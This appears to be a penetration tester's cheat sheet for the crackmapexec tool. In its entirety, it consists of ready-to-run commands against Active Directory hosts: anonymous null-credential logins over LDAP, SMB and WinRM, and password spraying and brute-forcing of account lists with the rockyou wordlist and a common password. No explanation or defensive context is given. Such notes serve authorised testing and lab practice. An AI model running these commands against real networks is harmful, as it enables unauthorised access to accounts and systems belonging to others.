# crackmapexec

#### #Legacy Anonymous is enabled or DC upgraded from 2003

crackmapexec ldap 10.0.10.1 -u ' ' -p ' '

crackmapexec smb 10.0.10.1 -u ' ' -p ' '

crackmapexec winrm 10.0.10.1 -u ' ' -p ' '

#### #Password spray AD

#### #Slow to work through passwords

crackmapexec ldap 10.0.0.1 -u userAccounts.txt -p rockyou.txt

#### #WinRM for quicker results

crackmapexec winrm 10.0.0.1 -u userAccounts.txt -p rockyou.txt

crackmapexec winrm 10.0.0.1 -u username -p rockyou.txt

crackmapexec winrm 10.0.0.1 -u userAccounts.txt -p Password123